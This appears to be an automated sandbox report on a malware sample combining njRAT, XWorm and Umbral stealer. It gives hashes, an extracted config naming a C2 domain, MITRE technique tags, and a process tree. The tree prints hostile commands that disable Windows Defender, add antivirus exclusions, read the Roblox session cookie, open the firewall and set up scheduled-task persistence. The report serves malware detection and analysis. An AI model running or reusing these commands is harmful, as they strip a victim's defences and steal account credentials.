njrat | 1b3be3019f94a15556df2cbd0448537152b48c812485f4160c8bd508b0d0c651

Analysis

max time kernel
45s
max time network
52s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
02-02-2025 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aquatic/loader.exe
Size

5.2MB
MD5

c136329a989aad9543c913f9197a01fe
SHA1

0b3bdab50947cf330243938c9ccb3e685c43457b
SHA256

9b802ef1b1e58a521a45dbd45c48c75c5b7f9ac53b273d6d2cf868c1f6d46885
SHA512

fa7a7efa10b4da760b7d281aa235fa4bb4ce28d12796f28632fd653ae184a6f09bc796c18ba1aa3253f713af0334d97f040dc762a8a1d25352dc7308d49b8590
SSDEEP

98304:fKYhdZRJ8os9WXz/DsEAE4SfTQ3+5wJCn9cK4KwrUWxeNVSreDGknLjiSXBI:CYhdo0D/D1J8+mM9Y/gNIsGkLj

Score

10^/10

njrat umbral xworm defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001b00000002aaba-7.dat	family_umbral
behavioral2/memory/3372-22-0x0000020C41300000-0x0000020C41340000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001900000002aacd-60.dat	family_xworm
behavioral2/memory/1256-64-0x0000000000530000-0x0000000000540000-memory.dmp	family_xworm

Njrat family
njrat
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 39 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3592	powershell.exe
4568	powershell.exe
1884	powershell.exe
3368	powershell.exe
4764	powershell.exe
4816	powershell.exe
848	powershell.exe
2912	powershell.exe
2000	powershell.exe
3780	powershell.exe
4816	powershell.exe
4396	powershell.exe
3144	powershell.exe
1652	powershell.exe
1464	powershell.exe
2728	powershell.exe
2092	powershell.exe
496	powershell.exe
2256	powershell.exe
3948	powershell.exe
848	powershell.exe
1640	powershell.exe
1512	powershell.exe
5056	powershell.exe
3144	powershell.exe
4436	powershell.exe
3352	powershell.exe
924	powershell.exe
8	powershell.exe
4100	powershell.exe
2872	powershell.exe
4032	powershell.exe
1920	powershell.exe
3156	powershell.exe
4276	powershell.exe
1344	powershell.exe
3356	powershell.exe
3528	powershell.exe
3740	powershell.exe

Drops file in Drivers directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4764	netsh.exe

Executes dropped EXE 62 IoCs

pid	Process
3372	Aquatic.exe
4068	Server.exe
2948	loader.exe
1884	Server.exe
1256	conhost.exe
3556	Aquatic.exe
1452	Server.exe
4024	loader.exe
4588	Server.exe
4808	conhost.exe
2480	Aquatic.exe
2876	Server.exe
1464	loader.exe
1052	Server.exe
3892	conhost.exe
1040	server.exe
4380	Aquatic.exe
4140	Server.exe
1196	loader.exe
4460	Aquatic.exe
2268	Server.exe
2056	loader.exe
2624	Aquatic.exe
2992	Server.exe
2804	loader.exe
3684	Aquatic.exe
4116	Server.exe
5000	loader.exe
1536	Aquatic.exe
2328	Server.exe
1032	loader.exe
664	Aquatic.exe
4616	Server.exe
4676	loader.exe
3760	Aquatic.exe
4940	Server.exe
2992	loader.exe
1068	Aquatic.exe
2828	Server.exe
3860	loader.exe
2844	Aquatic.exe
4680	Server.exe
2128	loader.exe
72	Aquatic.exe
1108	Server.exe
8	loader.exe
2996	Ondrive.exe
3784	Aquatic.exe
2772	Server.exe
3948	loader.exe
1424	Aquatic.exe
1380	Server.exe
3156	loader.exe
4684	Aquatic.exe
3380	Server.exe
1324	loader.exe
676	Aquatic.exe
3716	Server.exe
924	loader.exe
5092	Aquatic.exe
112	Server.exe
1312	loader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
36	discord.com
6	discord.com
10	discord.com
19	discord.com
23	discord.com
27	discord.com
31	discord.com
1	discord.com
14	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 16 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4916	cmd.exe
2912	PING.EXE
1636	PING.EXE
2132	cmd.exe
2736	PING.EXE
3132	cmd.exe
2428	cmd.exe
552	cmd.exe
2668	PING.EXE
4248	cmd.exe
2108	PING.EXE
2080	cmd.exe
3768	cmd.exe
4568	PING.EXE
3948	PING.EXE
2956	PING.EXE

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1544	wmic.exe
848	wmic.exe
908	wmic.exe
700	wmic.exe
4556	wmic.exe
1204	wmic.exe
4020	wmic.exe
1884	wmic.exe

Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery

T1018

pid	Process
2736	PING.EXE
2912	PING.EXE
1636	PING.EXE
4568	PING.EXE
3948	PING.EXE
2668	PING.EXE
2956	PING.EXE
2108	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3988	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1256	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3372	Aquatic.exe
8	powershell.exe
8	powershell.exe
848	powershell.exe
848	powershell.exe
3144	powershell.exe
3144	powershell.exe
2892	powershell.exe
4100	powershell.exe
4100	powershell.exe
2892	powershell.exe
4276	powershell.exe
4276	powershell.exe
1344	powershell.exe
1344	powershell.exe
3356	powershell.exe
3356	powershell.exe
4436	powershell.exe
4436	powershell.exe
4380	Aquatic.exe
2872	powershell.exe
2872	powershell.exe
4764	powershell.exe
4764	powershell.exe
4816	powershell.exe
4816	powershell.exe
3724	powershell.exe
3724	powershell.exe
848	powershell.exe
848	powershell.exe
2624	Aquatic.exe
4032	powershell.exe
4032	powershell.exe
1652	powershell.exe
1652	powershell.exe
3592	powershell.exe
3592	powershell.exe
4840	powershell.exe
4840	powershell.exe
2912	powershell.exe
2912	powershell.exe
1536	Aquatic.exe
3528	powershell.exe
3528	powershell.exe
4568	powershell.exe
4568	powershell.exe
1640	powershell.exe
1640	powershell.exe
3204	powershell.exe
3204	powershell.exe
1464	powershell.exe
1464	powershell.exe
1068	Aquatic.exe
1920	powershell.exe
1920	powershell.exe
2728	powershell.exe
2728	powershell.exe
1512	powershell.exe
1512	powershell.exe
3204	powershell.exe
3204	powershell.exe
2000	powershell.exe
2000	powershell.exe
72	Aquatic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3372	Aquatic.exe
Token: SeDebugPrivilege	1256	conhost.exe
Token: SeIncreaseQuotaPrivilege	4564	wmic.exe
Token: SeSecurityPrivilege	4564	wmic.exe
Token: SeTakeOwnershipPrivilege	4564	wmic.exe
Token: SeLoadDriverPrivilege	4564	wmic.exe
Token: SeSystemProfilePrivilege	4564	wmic.exe
Token: SeSystemtimePrivilege	4564	wmic.exe
Token: SeProfSingleProcessPrivilege	4564	wmic.exe
Token: SeIncBasePriorityPrivilege	4564	wmic.exe
Token: SeCreatePagefilePrivilege	4564	wmic.exe
Token: SeBackupPrivilege	4564	wmic.exe
Token: SeRestorePrivilege	4564	wmic.exe
Token: SeShutdownPrivilege	4564	wmic.exe
Token: SeDebugPrivilege	4564	wmic.exe
Token: SeSystemEnvironmentPrivilege	4564	wmic.exe
Token: SeRemoteShutdownPrivilege	4564	wmic.exe
Token: SeUndockPrivilege	4564	wmic.exe
Token: SeManageVolumePrivilege	4564	wmic.exe
Token: 33	4564	wmic.exe
Token: 34	4564	wmic.exe
Token: 35	4564	wmic.exe
Token: 36	4564	wmic.exe
Token: SeIncreaseQuotaPrivilege	4564	wmic.exe
Token: SeSecurityPrivilege	4564	wmic.exe
Token: SeTakeOwnershipPrivilege	4564	wmic.exe
Token: SeLoadDriverPrivilege	4564	wmic.exe
Token: SeSystemProfilePrivilege	4564	wmic.exe
Token: SeSystemtimePrivilege	4564	wmic.exe
Token: SeProfSingleProcessPrivilege	4564	wmic.exe
Token: SeIncBasePriorityPrivilege	4564	wmic.exe
Token: SeCreatePagefilePrivilege	4564	wmic.exe
Token: SeBackupPrivilege	4564	wmic.exe
Token: SeRestorePrivilege	4564	wmic.exe
Token: SeShutdownPrivilege	4564	wmic.exe
Token: SeDebugPrivilege	4564	wmic.exe
Token: SeSystemEnvironmentPrivilege	4564	wmic.exe
Token: SeRemoteShutdownPrivilege	4564	wmic.exe
Token: SeUndockPrivilege	4564	wmic.exe
Token: SeManageVolumePrivilege	4564	wmic.exe
Token: 33	4564	wmic.exe
Token: 34	4564	wmic.exe
Token: 35	4564	wmic.exe
Token: 36	4564	wmic.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	4808	conhost.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeIncreaseQuotaPrivilege	912	wmic.exe
Token: SeSecurityPrivilege	912	wmic.exe
Token: SeTakeOwnershipPrivilege	912	wmic.exe
Token: SeLoadDriverPrivilege	912	wmic.exe
Token: SeSystemProfilePrivilege	912	wmic.exe
Token: SeSystemtimePrivilege	912	wmic.exe
Token: SeProfSingleProcessPrivilege	912	wmic.exe
Token: SeIncBasePriorityPrivilege	912	wmic.exe
Token: SeCreatePagefilePrivilege	912	wmic.exe
Token: SeBackupPrivilege	912	wmic.exe
Token: SeRestorePrivilege	912	wmic.exe
Token: SeShutdownPrivilege	912	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 3372	1980	loader.exe	77
PID 1980 wrote to memory of 3372	1980	loader.exe	77
PID 1980 wrote to memory of 4068	1980	loader.exe	78
PID 1980 wrote to memory of 4068	1980	loader.exe	78
PID 1980 wrote to memory of 2948	1980	loader.exe	79
PID 1980 wrote to memory of 2948	1980	loader.exe	79
PID 4068 wrote to memory of 1884	4068	Server.exe	80
PID 4068 wrote to memory of 1884	4068	Server.exe	80
PID 4068 wrote to memory of 1884	4068	Server.exe	80
PID 4068 wrote to memory of 1256	4068	Server.exe	81
PID 4068 wrote to memory of 1256	4068	Server.exe	81
PID 3372 wrote to memory of 4564	3372	Aquatic.exe	82
PID 3372 wrote to memory of 4564	3372	Aquatic.exe	82
PID 3372 wrote to memory of 1776	3372	Aquatic.exe	85
PID 3372 wrote to memory of 1776	3372	Aquatic.exe	85
PID 3372 wrote to memory of 8	3372	Aquatic.exe	87
PID 3372 wrote to memory of 8	3372	Aquatic.exe	87
PID 2948 wrote to memory of 3556	2948	loader.exe	89
PID 2948 wrote to memory of 3556	2948	loader.exe	89
PID 2948 wrote to memory of 1452	2948	loader.exe	90
PID 2948 wrote to memory of 1452	2948	loader.exe	90
PID 2948 wrote to memory of 4024	2948	loader.exe	91
PID 2948 wrote to memory of 4024	2948	loader.exe	91
PID 3372 wrote to memory of 848	3372	Aquatic.exe	121
PID 3372 wrote to memory of 848	3372	Aquatic.exe	121
PID 1452 wrote to memory of 4588	1452	Server.exe	94
PID 1452 wrote to memory of 4588	1452	Server.exe	94
PID 1452 wrote to memory of 4588	1452	Server.exe	94
PID 1452 wrote to memory of 4808	1452	Server.exe	95
PID 1452 wrote to memory of 4808	1452	Server.exe	95
PID 3372 wrote to memory of 3144	3372	Aquatic.exe	96
PID 3372 wrote to memory of 3144	3372	Aquatic.exe	96
PID 3372 wrote to memory of 2892	3372	Aquatic.exe	98
PID 3372 wrote to memory of 2892	3372	Aquatic.exe	98
PID 1256 wrote to memory of 4100	1256	conhost.exe	99
PID 1256 wrote to memory of 4100	1256	conhost.exe	99
PID 1256 wrote to memory of 4276	1256	conhost.exe	102
PID 1256 wrote to memory of 4276	1256	conhost.exe	102
PID 1256 wrote to memory of 1344	1256	conhost.exe	104
PID 1256 wrote to memory of 1344	1256	conhost.exe	104
PID 3372 wrote to memory of 912	3372	Aquatic.exe	106
PID 3372 wrote to memory of 912	3372	Aquatic.exe	106
PID 1256 wrote to memory of 3356	1256	conhost.exe	108
PID 1256 wrote to memory of 3356	1256	conhost.exe	108
PID 3372 wrote to memory of 4136	3372	Aquatic.exe	110
PID 3372 wrote to memory of 4136	3372	Aquatic.exe	110
PID 3372 wrote to memory of 2264	3372	Aquatic.exe	112
PID 3372 wrote to memory of 2264	3372	Aquatic.exe	112
PID 4024 wrote to memory of 2480	4024	loader.exe	113
PID 4024 wrote to memory of 2480	4024	loader.exe	113
PID 4024 wrote to memory of 2876	4024	loader.exe	115
PID 4024 wrote to memory of 2876	4024	loader.exe	115
PID 4024 wrote to memory of 1464	4024	loader.exe	116
PID 4024 wrote to memory of 1464	4024	loader.exe	116
PID 2876 wrote to memory of 1052	2876	Server.exe	117
PID 2876 wrote to memory of 1052	2876	Server.exe	117
PID 2876 wrote to memory of 1052	2876	Server.exe	117
PID 2876 wrote to memory of 3892	2876	Server.exe	118
PID 2876 wrote to memory of 3892	2876	Server.exe	118
PID 3372 wrote to memory of 4436	3372	Aquatic.exe	119
PID 3372 wrote to memory of 4436	3372	Aquatic.exe	119
PID 3372 wrote to memory of 848	3372	Aquatic.exe	153
PID 3372 wrote to memory of 848	3372	Aquatic.exe	153
PID 1256 wrote to memory of 3988	1256	conhost.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 9 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2092	attrib.exe
2520	attrib.exe
1776	attrib.exe
2808	attrib.exe
3524	attrib.exe
496	attrib.exe
4196	attrib.exe
1252	attrib.exe
428	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aquatic\loader.exe
"C:\Users\Admin\AppData\Local\Temp\aquatic\loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
  "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
    3⤵
    - Views/modifies file attributes
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:912
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4136
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4436
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:848
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2428
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4568
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Users\Admin\AppData\Roaming\Server.exe
    "C:\Users\Admin\AppData\Roaming\Server.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:1040
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4764
- - C:\Users\Admin\AppData\Roaming\conhost.exe
    "C:\Users\Admin\AppData\Roaming\conhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3356
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3988
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
    "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
    3⤵
    - Executes dropped EXE
    PID:3556
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4588
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4808
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
      "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
      4⤵
      Executes dropped EXE
      PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2876
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1052
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Executes dropped EXE
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4380
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:1512
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        6⤵
        Views/modifies file attributes
        
        PID:2808
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3724
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
